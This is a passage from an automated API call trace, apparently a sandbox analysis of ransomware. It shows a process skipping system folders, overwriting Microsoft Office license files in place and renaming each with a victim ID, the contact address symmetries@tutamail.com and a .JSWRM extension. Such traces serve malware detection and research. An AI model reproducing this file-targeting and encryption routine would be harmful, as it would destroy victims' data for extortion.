lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0103.791] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.791] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0103.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.791] CloseHandle (hObject=0x45c) returned 1 [0103.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0103.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0103.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0103.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0103.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0103.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0103.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0103.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0103.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.793] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe43967f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe43967f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe451402c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4df5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="HOMEST~3.XRM")) returned 1 [0103.793] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0103.793] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0103.793] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0103.793] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0103.794] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0103.794] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0103.794] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0103.794] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.794] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0103.794] lstrcmpiW (lpString1="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0103.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0103.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0103.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0103.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0103.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0103.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0103.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.795] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19957) returned 1 [0103.795] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0103.795] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0103.808] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.808] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0103.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.808] CloseHandle (hObject=0x45c) returned 1 [0103.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0103.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0103.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0103.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0103.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0103.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0103.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.809] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0103.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0103.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.810] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe43967f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe43967f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe472a134, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Retail-pl.xrm-ms", cAlternateFileName="HOMEST~2.XRM")) returned 1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.821] lstrcmpiW (lpString1="HomeStudentR_Retail-pl.xrm-ms", lpString2="msocache") returned -1 [0103.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0103.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0103.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0103.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0103.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241308, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0103.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0103.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.822] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10651) returned 1 [0103.822] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0103.822] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0103.824] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.825] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0103.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.825] CloseHandle (hObject=0x45c) returned 1 [0103.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0103.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0103.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0103.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0103.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0103.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0103.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0103.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0103.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0103.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0103.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0103.826] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe49fedb3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe49fedb3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4c3b14f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5464, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Retail-ppd.xrm-ms", cAlternateFileName="HOBB18~1.XRM")) returned 1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.826] lstrcmpiW (lpString1="HomeStudentR_Retail-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0103.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240fe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0103.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0103.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Retail-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0103.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0103.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0103.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.827] 